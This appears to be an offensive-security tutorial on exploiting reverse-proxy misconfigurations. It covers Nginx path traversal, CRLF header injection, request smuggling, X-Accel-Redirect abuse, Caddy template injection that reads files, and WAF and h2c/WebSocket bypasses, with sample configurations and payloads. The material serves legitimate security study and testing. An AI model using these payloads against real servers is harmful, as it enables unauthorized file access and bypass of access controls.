Reverse Proxies
Servers on top of web applications that route traffic, manage headers and more
All directives in Nginx are explained in this list:
The `/etc/nginx/nginx.conf` file contains the global configuration, as well as a line to include all configuration files in the `/etc/nginx/conf.d/` folder.
Because these files are included inside the `http {}` context, they do not need to open it again. You will often see extra options for the `http` context added here, as well as `server {}` definitions per application.
Below are some common security misconfigurations that can allow for specific attacks.
One classic trick in Nginx is the "off-by-slash" misconfiguration, where two conditions meet:

* a `location` that is missing a trailing slash
* a directive like `alias` or `proxy_pass` with a trailing slash
The example below contains the vulnerability twice:
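A sketch of such a configuration, using the `/app/static/` and `v1/` paths discussed below (the backend address is illustrative):

```nginx
location /static {                  # missing trailing slash
    alias /app/static/;             # trailing slash
}

location /api {                     # missing trailing slash
    proxy_pass http://backend/v1/;  # trailing slash
}
```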
The problem is that `location /static` will match any path starting with `/static`, including `/staticANYTHING` or `/static../anything`. Nginx then strips this prefix and continues with the leftover path. That leftover may be `../anything`, and when appended to the `static/` folder or the `v1/` backend path, it traverses one directory up.
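For example, a request with the traversal embedded right after the prefix (request path is illustrative):

```http
GET /static../index.php HTTP/1.1
```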
This will create the path /app/static/../index.php
, which may leak the sensitive source code in /app/index.php
. Same idea with the proxy_pass
, it could be used to access an unintended directory on the backend intended for debugging, other versions, of even another application.
You may find a backend application vulnerable to Path Traversal through the request path, but be unable to get `../` sequences through to it due to an overlaying Nginx proxy that returns `400 Bad Request` whenever you traverse past the root path. For example:
```
/../../anything               -> Bad Request
/deep/path/../../anything     -> OK
/deep/path/../../../anything  -> Bad Request
```
If you're lucky, `merge_slashes` has been changed from its default value to `off`. In this case, Nginx will not collapse repeated slashes (e.g. `//`) before performing this check, allowing you to make it think you are in a very deep path. When the vulnerable application then receives the URI and uses it in a file path, the repeated slashes are merged into a single one, allowing you to traverse past the root. Below is an example:
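A sketch of such a request (the filename is illustrative). Each extra slash creates an empty path segment that absorbs one `../` during Nginx's check, while the backend merges the slashes first and therefore traverses past the root:

```http
GET /////../../../../secret.txt HTTP/1.1
```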
Note: if the vulnerable endpoint sits deeper in a directory, you can already traverse as many directories up as you are deep from the root path. As seen in the examples above, with `/deep/path` you can still traverse 2 directories up without being blocked. No need for `merge_slashes off;` in that case.
Nginx performs normalization before matching `location` directives. Specifically, it URL-decodes the path, resolves any `../` sequences, and merges repeated slashes. Only after doing so does it check whether the path starts with `/api`:
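A minimal sketch of such a prefix check (the backend address is illustrative):

```nginx
location /api {
    proxy_pass http://backend;
}
```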
The URL-decoded version is even sent through to the backend, making it possible for some strange URLs to be interpreted in unexpected ways.

| Request path | Normalized path (matching) | Sent to backend |
| --- | --- | --- |
| `/api/../anything` | `/anything` | Doesn't match `/api` |
| `/anything/../api` | `/api` | `/anything/../api` |
| `/api%2Fanything` | `/api/anything` | `/api/anything` |
| `/anything%2f..%2fapi` | `/api` | `/anything/../api` |
When dealing with multiple layers of proxies, it may be possible to make one proxy think the path is using one prefix, while the other proxy sees a different prefix, applying rules and routing accordingly.
The `rewrite` directive takes the normalized value, but also URL-decodes the path one more time. Take the following example:
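A sketch of such a configuration (the rewrite rule and backend address are illustrative):

```nginx
location /api/ {
    # re-appends the captured remainder, triggering an extra decode
    rewrite ^/api/(.*)$ /api/$1 break;
    proxy_pass http://backend;
}
```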
While this configuration would normally restrict the backend to the `/api` directory, the rewrite causes an extra URL-decoding operation. This allows `%252f`, which isn't recognized as a slash during Nginx's normalization, to turn into a real `/` for the backend.
After rewriting, the resulting path may be interpreted by the backend as `/anything`, escaping the `/api/` directory:
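For example (payload is illustrative), `%252f` decodes to `%2f` during normalization, which still starts with `/api/`, and the rewrite decodes it once more:

```
/api/..%252fanything  ->  /api/../anything  ->  resolved by the backend as /anything
```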
While testing for these kinds of vulnerabilities black-box, you should test every subdirectory, as different `location` directives may have different rules. Look out for slightly different response bodies or headers to tell them apart.
A surprising number of sinks in Nginx also accept raw carriage return and newline characters (`\r\n`). If a variable containing these raw characters is passed to such a sink, you can inject headers into requests or responses.
First, you need a variable containing raw `\r\n` characters. A commonly used one is `$uri`, which contains the decoded path. If your path contains `%0d%0a` sequences, these are decoded and end up in the variable.
Another method is using Regular Expressions (RegEx) in a location to match a specific part of the URI. The value matched in a `location` directive is URL-decoded as we learned earlier, so any captured group (like `$1`) will be as well. Importantly, a `.` cannot match newlines, even though it should match any character, because the DOTALL flag is missing by default. A negated character class (e.g. `[^abc]`), however, can match newlines!
To exploit this, you can inject the encoded characters into the capturing group, where they are decoded before being used:
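A sketch of such a configuration (the path and header name are illustrative). The negated class `[^/]*` happily matches `\r\n`, so a request like `/tag/x%0d%0aSet-Cookie:%20a=1` puts a raw CRLF into `$1`:

```nginx
location ~ ^/tag/([^/]*)$ {
    add_header X-Tag $1;    # decoded capture, may contain \r\n
    proxy_pass http://backend;
}
```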
When raw characters end up in an add_header
, you can add more headers below that header to the response. See the example above.
Another interesting case is when `return` issues a redirect using the `Location:` header, because it is also vulnerable to CRLF-injection:
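A sketch of such a redirect rule, matching the `/html/$1.html` format discussed below:

```nginx
location ~ ^/html/([^/]*)$ {
    return 302 /html/$1.html;
}
```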
By fitting the regex format, the `/html/$1.html` path becomes a `Location:` header with a CRLF inside it:
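For example (injected header is illustrative), a request whose path contains an encoded CRLF splits the redirect response:

```http
GET /html/x%0d%0aSet-Cookie:%20session=attacker HTTP/1.1

HTTP/1.1 302 Moved Temporarily
Location: /html/x
Set-Cookie: session=attacker.html
```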
Check out Header / CRLF Injection to learn how to exploit this for XSS.
Lastly, the Cache-Control:
header may come in useful if you want to poison/deceive the cache.
When unescaped characters end up in `proxy_pass` paths or `proxy_set_header` values, you can inject request headers. This works similarly to Response Headers, but the exploitation is wildly different.
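A sketch of such a configuration (the `X-Original-Path` name is illustrative; `X-Internal-Header` is the stripped header discussed below):

```nginx
location / {
    proxy_set_header X-Original-Path $uri;  # raw decoded path, may contain \r\n
    proxy_set_header X-Internal-Header "";  # strip the client-supplied value
    proxy_pass http://backend;
}
```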
Above, the `$uri` variable is insecurely put into a header value. The `X-Internal-Header` is also stripped from our request, presumably because the application doesn't want the user to control it.
By injecting a CRLF sequence in the path, however, we can still send this header to the backend:
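Assuming the proxy copies `$uri` into a header value as sketched above, a request like the following smuggles the stripped header through:

```http
GET /%0d%0aX-Internal-Header:%20admin HTTP/1.1
Host: target
```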
This can be useful for controlling internal headers, or spoofing trusted values like X-Client-IP
.
By injecting two CRLF sequences, you can even terminate the previous HTTP request to perform HTTP Request Smuggling. If Nginx keeps the connection to the backend open, you can inject into this queue to send raw requests that wouldn't normally be allowed, desynchronize other users, or leak internal headers by playing around with the `Content-Length:` header.
Importantly, the above is often possible through just a specific path. You can make a victim visit this in their browser to poison their own connection, creating a client-side desync.
Nginx understands some special headers from the backend when proxying using proxy_pass
. To demonstrate this, see the following configuration:
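A sketch of a configuration with an internal location (paths and responses are illustrative):

```nginx
location / {
    proxy_pass http://backend;
}

location /internal {
    internal;  # only reachable via internal redirects, not remotely
    return 200 "secret data";
}
```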
The backend needs to have a feature or vulnerability that allows you to inject arbitrary response headers. This is also common with SSRF to an attacker's server.
The `X-Accel-Redirect` response header rewrites the URL: Nginx performs another location evaluation and responds with that result instead. If we set its value to `/internal`, the handler for `location /internal` will be used even though the requested path is still `/`. This bypasses the `internal;` directive, which normally makes the location impossible to request remotely.
Some more internal headers you can use in combination with this are (source):
* `X-Accel-Charset`: sets the charset of the `Content-Type:` header to the given value
* `X-Accel-Buffering`: enables or disables buffering of the response
* `X-Accel-Limit-Rate`: bytes per second to send to the client
* `X-Accel-Expires`: when to expire the cache for this response
The main `Caddyfile` controls the configuration of the proxy. You can best learn it from looking at examples online, as the documentation can be limited for some features.
There are two types of templating in Caddy. First, there is the `{...}` placeholder syntax, enabled by default in your `Caddyfile`:
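A minimal sketch (port and body are illustrative), using the `{path}` shorthand placeholder:

```caddyfile
:8080 {
    respond "You requested {path}"
}
```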
These are called placeholders and are documented below:
When the templates
directive is set, the response will be evaluated as a template. Below is an example where this would be useful:
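A sketch of a site that serves files through the template engine (paths are illustrative), so that served files can use `{{...}}` expressions:

```caddyfile
:8080 {
    root * /srv/site
    templates
    file_server
}
```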
All accessible properties and functions are documented here:
Internally, it uses Go's `text/template` to evaluate the `{{...}}` syntax. Importantly, this happens after placeholders are substituted. That means if a placeholder contains user input and is put into a response, the user input will be evaluated as a template! This allows you to call dangerous functions such as:
{{env "VAR_NAME"}}
: Gets an environment variable
{{listFiles "/"}}
: List all files in a directory (relative to configured root)
{{readFile "path/to/file"}}
: Read a file (relative to configured root)
The code below is vulnerable because it puts a placeholder value in the response while the `templates` directive is enabled:
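A sketch of such a vulnerable setup (port and body are illustrative). The `{path}` placeholder is substituted first, and the result is then evaluated as a template:

```caddyfile
:8080 {
    templates
    respond "Requested path: {path}"
}
```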
With a payload like the following, you can read arbitrary files:
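For example (filename is illustrative), putting a template expression into the path:

```
GET /{{readFile "secret.txt"}}
URL-encoded: /%7B%7BreadFile%20%22secret.txt%22%7D%7D
```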
In case your character set is limited (e.g. you cannot use quotes), it is possible to read strings from other values such as `.Req.URL.RawQuery` or an index of `.Req.Header`:
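A sketch of a quote-less payload (filename is illustrative), passing the filename through the query string instead:

```
GET /{{readFile .Req.URL.RawQuery}}?secret.txt
```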
As an alternative to quotes, you can also use backticks (`` ` ``) to create inline strings.
Below are some generic techniques for reverse proxies that act as Web Application Firewalls (WAFs) to block certain dangerous requests. This often includes blocking attack-like syntax such as `' OR 1=1;--` or marking certain paths as "internal only".
If it is trying to block a certain path from being accessed, such as /admin
, you may be able to obfuscate it so that the reverse proxy doesn't recognize it anymore while the application still does.
In Nginx, for example, a `location = ...` rule requires the normalized path to exactly match the given location for the rule to trigger. By adding any byte to the end of the path, it is no longer recognized, while many applications still interpret certain special bytes as harmless suffixes. The research below explores this in various servers:
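For example, an exact-match block rule might look like this (sketch):

```nginx
location = /admin {
    deny all;
}
```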
This should prevent access to the `/admin` endpoint, but if the backend defines a handler for it in Express.js, you can bypass the rule by appending the byte `\x85` to the end of your path:
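The byte can be sent percent-encoded, for example:

```http
GET /admin%85 HTTP/1.1
```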
Caddy also has a way to block certain paths:
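A sketch of such a block in a `Caddyfile` (port and backend address are illustrative):

```caddyfile
:8080 {
    @admin path /admin
    respond @admin "Forbidden" 403
    reverse_proxy backend:8000
}
```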
In versions < 2.4.6, this path matcher was a literal equality check, meaning it was trivially bypassable using:
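One possible variant (illustrative): a dot-segment is not equal to `/admin` literally, while most backends normalize it away:

```http
GET /./admin HTTP/1.1
```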
Other combinations using `../` and encoded `%2e%2e%2f` sequences may help confuse the proxy and the backend.
If you want to communicate with the backend directly, without the proxy in the way, you may be able to trick the proxy into thinking you are speaking a binary protocol so that it no longer interferes. With such a connection to the backend, you can send arbitrary HTTP requests and receive raw responses.
There are two techniques for this, the first involving WebSockets. To fully understand the attack, read the README in this repository:
Setting up a WebSocket connection typically goes like this:

1. The client sends an HTTP GET request with `Upgrade: websocket`, `Sec-WebSocket-Version: 13` and `Sec-WebSocket-Key: <SOME_NONCE>` headers
2. The proxy forwards this request to the backend
3. The backend implements WebSockets for the requested endpoint, so it returns a `101` status code with a `Sec-WebSocket-Accept:` header derived from the nonce
4. The proxy recognizes the status code as a successful WebSocket handshake, so it switches the state of this TCP connection to binary data passthrough
5. The client and backend can now communicate directly over WebSocket frames
An issue occurs when the proxy does not check the response status code, but instead uses some other heuristic, like the response headers, to determine that a WebSocket connection was established. If the handshake was actually unsuccessful (for example due to a wrong `Sec-WebSocket-Version: 1337` header), the backend still expects HTTP requests.
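Such an intentionally failing handshake might look like this (endpoint and key are illustrative):

```http
GET /ws HTTP/1.1
Host: target
Connection: Upgrade
Upgrade: websocket
Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==
Sec-WebSocket-Version: 1337
```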
At this point the proxy has switched to forwarding raw TCP, because it thinks the connection speaks WebSocket frames. In reality, the client can now send HTTP requests to the backend and receive raw responses, bypassing the proxy.
For other types of proxies that do check the status code, you may still be able to confuse them by making the backend return that correct status code through an SSRF or another mechanism that lets you set it to 101. This creates the same scenario: the proxy thinks the connection has switched to WebSocket frames, and the content is no longer checked.
So, by pointing the backend at your server and returning a status code 101 response, which it reflects, the proxy will think a WebSocket connection has been established. The client can then send arbitrary HTTP requests over this connection, because the proxy expects binary WebSocket frames, while the backend still expects HTTP and responds directly.
There is another protocol we can `Upgrade:` to, named `h2c` or "HTTP/2 cleartext". The name comes from the fact that HTTP/2 is normally only available over encrypted TLS connections, where it is negotiated during the handshake. As an alternative, a regular HTTP/1.1 connection can be upgraded to HTTP/2 using a request like the following:
The rest of the messages will now go over HTTP/2's binary protocol.
When a proxy is in the way, it should only expect an h2c upgrade when the communication is cleartext (no TLS). But what happens if we attempt it over TLS anyway?
That question is answered in the following post, which leads to this attack:
It turns out that proxies that forward the upgrade headers to the backend will receive the `101 Switching Protocols` response and proceed to set up a binary tunnel between the client and the server. Since the connection now speaks HTTP/2, the proxy won't inspect it anymore, and you as the client can send arbitrary requests to the backend and receive raw responses.
Note that the backend server has to support h2c upgrades for this to work, which is often a manual setting. The tool below can test and exploit this easily given a URL:
With the `Location:` header case, this becomes trickier because you cannot simply overwrite the response and expect the browser to render it. Often there is a prefix in the Location header before your input, leaving no way to get XSS.
As an alternative, you can still set the Set-Cookie:
header which is allowed during redirects. This allows you to set arbitrary cookies, becoming a gadget.